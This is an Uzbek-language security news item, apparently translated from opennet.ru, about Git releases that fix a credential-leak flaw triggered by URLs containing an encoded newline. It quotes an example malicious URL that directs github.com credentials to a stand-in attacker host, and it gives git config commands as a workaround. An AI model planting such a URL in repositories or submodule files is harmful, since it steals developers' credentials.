Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 va 2.17.4 taqsimlangan manbalarni boshqarish tizimining tuzatuvchi versiyalari qaysi yo'q qildi () ishlov beruvchida "", bu git mijozi yangi satr belgisini o'z ichiga olgan maxsus formatlangan URL yordamida omborga kirganda, hisob ma'lumotlarini noto'g'ri xostga yuborishga olib keladi. Zaiflikdan boshqa xostdan hisob ma'lumotlarini tajovuzkor tomonidan boshqariladigan serverga yuborishni tartibga solish uchun foydalanish mumkin.
“https://evil.com?%0ahost=github.com/” kabi URL manzilini belgilashda evil.com xostiga ulanishda hisob ma’lumotlarini ishlovchi github.com uchun belgilangan autentifikatsiya parametrlarini o‘tkazadi. Muammo "git clone", jumladan, submodullar uchun URL-larni qayta ishlash kabi operatsiyalarni bajarishda yuzaga keladi (masalan, "git submodule update" .gitmodules faylida ko'rsatilgan URL-manzillarni ombordan avtomatik ravishda qayta ishlaydi). Zaiflik ishlab chiquvchi URL manzilini ko'rmasdan omborni klonlashi mumkin bo'lgan holatlarda, masalan, submodullar bilan ishlashda yoki avtomatik harakatlarni bajaradigan tizimlarda, masalan, paketlarni yaratish skriptlarida eng xavflidir.
Yangi versiyalarda zaifliklarni bloklash uchun hisob ma'lumotlarini almashtirish protokoli orqali uzatiladigan har qanday qiymatlarda yangi qator belgisini o'tkazish. Tarqatishlar uchun siz sahifalarda paket yangilanishlarining chiqarilishini kuzatishingiz mumkin , , , , , , .
Muammoni blokirovka qilish uchun vaqtinchalik yechim sifatida Umumiy omborlarga kirishda credential.helper dan foydalanmang va tekshirilmagan omborlar bilan "--recurse-submodules" rejimida "git clone" dan foydalanmang. credential.helper ishlov beruvchisini butunlay o'chirib qo'yish uchun va parollarni olish , himoyalangan yoki parollari bo'lgan fayl uchun buyruqlardan foydalanishingiz mumkin:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Manba: opennet.ru